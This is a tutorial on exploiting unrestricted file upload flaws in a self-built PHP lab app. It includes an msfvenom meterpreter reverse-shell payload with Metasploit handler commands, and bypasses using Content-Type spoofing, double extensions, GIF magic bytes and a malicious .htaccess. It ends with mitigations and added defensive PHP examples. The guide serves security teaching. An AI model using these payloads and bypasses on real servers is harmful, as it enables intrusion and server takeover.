Comprehensive Guide on Unrestricted File Upload
Contents
• Introduction
• Introduction to Unrestricted File Upload
• Impact of Unrestricted File Upload
• File Upload Exploitation
  • Basic File Upload
  • Content-Type Restriction
    • What this Content-Type is?
  • Double Extension File Upload
  • Image Size Validation Bypass
  • Blacklisted Extension File Upload
• How to Mitigate?
Introduction
A dynamic web application, at some point or other, allows its users to upload a file, whether it is an image, a resume, a song, or anything specific. But what if the application does not validate these uploaded files and passes them to the server directly? Today, in this article, we'll learn how such missing validation of user input, together with server mismanagement, opens up the gates for attackers to host malicious content through the Unrestricted File Upload functionality in order to bring down web applications.
Introduction to Unrestricted File Upload
“Upload Here” or “Drag Your File To Upload”: you might have seen these two phrases almost everywhere, whether you are setting up your profile picture or simply applying for a job. Developers script up File Upload HTML forms, which allow users to upload files onto the web server. However, this ease brings danger if the developer does not validate what files are being uploaded.
Attackers exploit file upload vulnerabilities, which are major problems within web-based applications. In many web servers, this vulnerability relies entirely on intention, enabling an attacker to upload a file containing malicious code that can then execute on the server.
Impact of Unrestricted File Upload
The consequences of this file upload vulnerability vary with every web application, as they depend on how the uploaded file is processed by the application and where it is stored.
Therefore, through this vulnerability, the attacker is able to:
• Take over the victim's complete system with server-side attacks.
• Inject files with malicious paths which can overwrite existing critical files, for example by including a “.htaccess” file to execute specific scripts.
• Reveal internal and sensitive information about the web server.
• Overload the file system or the database.
• Inject phishing pages in order to simply deface the web application.
This file upload vulnerability has been reported with a CVSS Score of “7.6” (High Severity) under:
• CWE-434: Unrestricted Upload of File with Dangerous Type
So, I guess you are now aware of the concept of file upload, why it occurs, and even the consequences the developer might face if the validations are not implemented properly. Thus, let's dig deeper and learn how to exploit this File Upload vulnerability in all the major ways we can.
For this section, we have developed a basic web application with some PHP scripts that suffers from a File Upload vulnerability.
Let's Start!!
File Upload Exploitation
Basic File Upload
There are times when developers are not aware of the consequences of the File Upload vulnerability and thus write basic PHP scripts with ease just to complete their tasks. But this leniency opens the gates wide.
Let's check out the script which accepts the uploaded files from the basic File Upload HTML form on the webpage.
From the above code snippet, you can see that the developer hasn't implemented any input validation condition, i.e. the server won't check the file extension, the content type or any other specific argument, and simply accepts whatever we upload.
So let's try to exploit the above web application by creating a PHP backdoor with our favourite msfvenom one-liner:
msfvenom -p php/meterpreter/reverse_tcp lhost=[Link] lport=4444 -f raw
Copy and paste the highlighted code into your text editor and save it with a PHP extension; here I saved it as “[Link]” on the desktop.
Now, back in the application, click on the Browse tab and select [Link] from the desktop.
So, let's hit the Upload button, which will upload our file onto the web server.
From the above image, you can see that our file has been uploaded successfully. We can check the same by clicking the “here” text.
But wait! Before hitting the “here” text, let's load up our Metasploit framework and start the multi handler with
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost [Link]
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
Now, as we hit the “here” text, we get our meterpreter session and we have got the victim's server.
Content-Type Restriction
Until now, we were only focusing on the case where the developer does not validate anything, and only then is the web application vulnerable. But what if he implements validations, whether basic or major ones: will it still suffer from the File Upload vulnerability?
Let's unlock this question too.
Here, back in our vulnerable web application, let's try to upload our [Link] file again.
Oops!! This time we face a warning, as it only accepts “PNG” files.
But why did this happen? Let's take one step back and upload [Link] again; this time turn your Burp Suite “ON” and capture the ongoing HTTP request.
From the below image, in my Burp Suite monitor, you can see that the content type here is “application/x-php”.
What this Content-Type is?
The “Content-Type” entity in the header indicates the internal media type of the message content. Sometimes web applications use this parameter in order to recognize a file as a valid one. For instance, they only accept files with the “Content-Type” of “text/plain”.
So it might be possible that the developer uses this to validate his application.
Let's try to bypass this protection by changing the content-type parameter to “image/png” in the request header.
Hit the Forward button and check its response!!
From the above image, you can see that we've successfully bypassed this security. Again, repeat the same process to run the multi handler in the background before clicking the “here” text.
Great!! We're back in the victim's server.
Let's check out its backend code to be more precise about why this all happened.
As guessed earlier, the developer has used the content-type parameter as a part of his validation process. Thus here, he rejects the upload when the $igcontent value is not equal to “image/png”.
Double Extension File Upload
Moving on to the next section: when we tried again by manipulating the content-type in the request header to “image/png”, we failed this time.
From the below image, you can see that the application halts us on the screen with an error asking us to upload a “PNG” file.
So this might have happened because the application is checking the file extension, i.e. it only allows files with the “.png” extension to be uploaded onto the web server and restricts other files, as the error speaks out!!
Let's check out the developer's code here:
Here, he sets up three new variables:
1. “$igallowed”, which contains an array for the extension “png”, i.e. the web server will accept only a file which has .png at the end.
2. Now, in the next variable $igsplit, he uses the explode() function with a reference to “.”; thus the PHP interpreter will break up the complete filename wherever it encounters a dot “.”.
3. In the third variable, $igExtension, he uses the end() function on the value of $igsplit, which will thus contain the last piece of the filename.
For example:
Say we upload a file as “[Link]”. First, $igsplit explodes the filename at each dot, i.e. the file is now in three parts as [Reverse] [php] [png]. Thus $igExtension will take the end value of the filename, i.e. [png].
4. Now, he even sets up an if condition that checks the content-type value, compares it with “image/png”, and verifies png in the $igExtension and the $igallowed. If any of the three conditions fails, it raises an error; otherwise, it passes.
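The check described in the four steps above, reproduced as an added example (not the guide's own code) next to a stricter version of the same check; the function names and sample filenames are constructed for illustration:

```php
<?php
// Added example (not the guide's own code): the extension check the guide
// describes, beside a stricter version. Function names and the sample
// filenames are constructed for illustration.

// The check as described: explode the name on ".", take the last piece,
// and compare it (plus the client-supplied Content-Type) with the allowed list.
function weakCheck(string $filename, string $contentType): bool
{
    $igallowed   = ['png'];
    $igsplit     = explode('.', $filename);
    $igExtension = end($igsplit);
    return $contentType === 'image/png' && in_array($igExtension, $igallowed, true);
}

// Stricter version: require exactly one extension, compare it case-insensitively,
// and ignore Content-Type altogether, because the client chooses that header.
function strictCheck(string $filename): bool
{
    $igallowed = ['png'];
    $parts = explode('.', basename($filename));   // basename() drops any path
    if (count($parts) !== 2 || $parts[0] === '') {
        return false;   // rejects "Reverse.php.png", ".png" and names with no extension
    }
    return in_array(strtolower($parts[1]), $igallowed, true);
}

// end() only ever sees the last piece, so a name carrying two extensions
// satisfies weakCheck(); strictCheck() looks at the whole name instead.
$samples = ['Reverse.png', 'Reverse.php.png', 'photo.PNG', 'shell.php'];
foreach ($samples as $name) {
    printf("%-16s weak=%s strict=%s\n", $name,
        weakCheck($name, 'image/png') ? 'accept' : 'reject',
        strictCheck($name) ? 'accept' : 'reject');
}
```

Even the strict check only decides which names are stored; whether a stored file can ever run is decided by the web server's handler mapping for the upload directory, which the next paragraphs cover.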
Many techniques may help us to bypass this restriction, but the most common and most preferred way is the “Double Extension”, which hides the real nature of a file by inserting multiple extensions into a filename, creating confusion for the security checks.
For example, [Link] looks like a png image, which is data, not an application, but when someone uploads the file with the double extension, it executes as a php file, which is an application.
Let's check out how!!
Here, I've renamed the previous file, i.e. [Link], to “[Link]”.
From the below image, you can see that when I clicked the “Upload” button, I was presented with a success window as
Great!! We've again bypassed this file extension security. Turn your Metasploit Framework back on as we did earlier and then hit the “here” text in order to capture the meterpreter session.
Wonder why this all happened?
This occurs due to one major reason: Server Misconfiguration.
The web server might be misconfigured with the following insecure configuration, which enables the double extension and makes the web application vulnerable to double extension attacks.
Note:
In order to make a double extension attack possible, “$” should be removed from the end of the lines in the secured configuration, using
nano /etc/apache2/mods-available/[Link]
Image Size Validation Bypass
You might have seen applications that restrict the file size, i.e. they do not allow users to upload a file over a specific size. You can simply bypass this validation by uploading the smallest-sized payload.
So, in our case, we weren't able to upload [Link] as its size was more than 3Kb, which thus didn't satisfy the developer's condition. Let's check out the backend code for it.
Here, he uses a new variable, $igdetails, which calls a PHP function, i.e. getimagesize(). This predefined function is basically used to detect image files: it reads the file and returns the size of the image if a genuine image is uploaded, else, in case an invalid file is there, getimagesize() fails. Further in the section, he even uses another variable, $igallowed, which thus only accepts “gif” images.
So let's call one of the smallest payloads, that is [Link] from the webshells directory, and paste it onto our Desktop.
cp /usr/share/webshells/php/[Link] /root/Desktop/
Now, it's time to set a double extension on it; this time we'll be making it into a gif.
mv [Link] [Link]
Wait!! Before uploading this file, we need to set one more thing, i.e. we need to add a Magic Number for GIF images, such that if the server doesn't check the extension and instead checks the header of the file, we won't get caught. So in the case of “gif”, the magic number is “GIF89” or “GIF89a”; we can use either of the two.
Time to upload!!
From the below image, you can see that we have successfully uploaded our file onto the web server.
Hit the “here” text and check what we can grab with it.
Great!! We have successfully bypassed this security too. Now, let's try to grab some sensitive content.
Blacklisted Extension File Upload
So, until now we succeeded just because the developer had validated everything else, but he didn't validate the php file, say with a not-allowed condition or with any specific argument.
But here, this time we encountered the same: he blacklisted everything, saying “php or Php extensions”; he did whatever he could.
Whenever someone implements a blacklist for anything, it opens up the gates to other things too. For example, if the developer blacklists .php, we could upload .PHP or .Php5 or anything specific.
Similarly here, when we tried to bypass the file upload section with every possible method, either content type or double extension, we failed every time and got the reply as
Thus, further, I tried to do the same by renaming the file from “[Link]” to “[Link]”.
And as I hit the Upload button, I got success!!
But wait, let's check whether the file works or not: as I clicked on the “here” text, the system redirected me to the new page, but my file didn't execute.
So why did this all happen? We've bypassed the security; it should work.
This happened because the target's web server was not configured to execute files with the .PHP extension, i.e. we've bypassed the web application's security but the server was not able to execute files with any extension other than .php.
So, in order to execute files with our desired extension, we need to upload an “htaccess” file, i.e. a file with
AddType application/x-httpd-php PHP
Save the above content in a file and name it “.htaccess”.
But before uploading our file onto the server, the server should accept and allow .htaccess files in the directory, which can be turned “On” by setting AllowOverride to All from None.
Note:
Many web applications set AllowOverride to “All” for some of their specific purposes.
Let's change it in our web server at
cd /etc/apache2/[Link]
Change it to All in the /var/www/ directory.
Now restart the Apache server with
sudo service apache2 restart
Back in our web application, let's try to upload our “.htaccess” file.
Great!! Uploaded successfully. Let's now try to upload our payload file there again.
Hit the Upload button, but this time, before clicking the “here” text, let's set up our Metasploit framework again as we did earlier.
Cool!! From the image below, you can see that we've successfully bypassed this blacklist validation too and we are back with a new meterpreter session.
How to Mitigate?
• Rather than a blacklist, the developer should implement a set of acceptable files, i.e. a whitelist, in his scripts.
• The developer should allow only specific file extensions.
• Only authorized and authenticated users should be able to use the feature to upload files.
• Never display the path of the uploaded file. If review of the file is required, then initially the file should be stored in a temp directory with the least privileges.
• Patch the server properly, not just the web application, i.e. do not allow double extensions and set AllowOverride to “None” if not required.
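An upload handler that applies the mitigations listed above, and also addresses the getimagesize() and magic-number checks from the Image Size Validation section, as an added example (not the guide's own code); the upload directory, the size limit, the form field name “file” and the use of the GD extension for re-encoding are assumptions:

```php
<?php
// Added example (not the guide's own code). Assumed: the upload directory,
// the size limit, the form field name "file", and the GD extension for re-encoding.
const UPLOAD_DIR = '/var/uploads';  // outside the web root; no script handler mapped
const MAX_BYTES  = 2 * 1024 * 1024;
const ALLOWED    = ['png' => 'image/png', 'gif' => 'image/gif', 'jpg' => 'image/jpeg'];

function acceptUpload(array $file): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Whitelist, not blacklist: the name must carry exactly one allowed extension,
    // compared case-insensitively, so "Reverse.php.png" and ".PHP" are both refused.
    $parts = explode('.', basename($file['name']));
    if (count($parts) !== 2 || $parts[0] === '' || !isset(ALLOWED[strtolower($parts[1])])) {
        throw new RuntimeException('extension not allowed');
    }
    $ext = strtolower($parts[1]);
    // Inspect the bytes on disk; $_FILES['file']['type'] is client-supplied and ignored.
    if ((new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']) !== ALLOWED[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // A file that merely starts with "GIF89a" passes the magic-number check above
    // and may also pass getimagesize(); decoding and re-encoding it with GD keeps
    // only pixel data, so anything appended after the header is dropped.
    $img = @imagecreatefromstring(file_get_contents($file['tmp_name']));
    if ($img === false) {
        throw new RuntimeException('not a decodable image');
    }
    // Random server-chosen name: the client's filename and the storage path are
    // never reused or shown, and the stored file is always a PNG.
    $target = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.png';
    if (!imagepng($img, $target)) {
        throw new RuntimeException('could not store file');
    }
    imagedestroy($img);
    return $target;
}

if (isset($_FILES['file'])) {
    try {
        acceptUpload($_FILES['file']);
        echo 'Upload accepted';
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'Rejected: ' . htmlspecialchars($e->getMessage());
    }
}
```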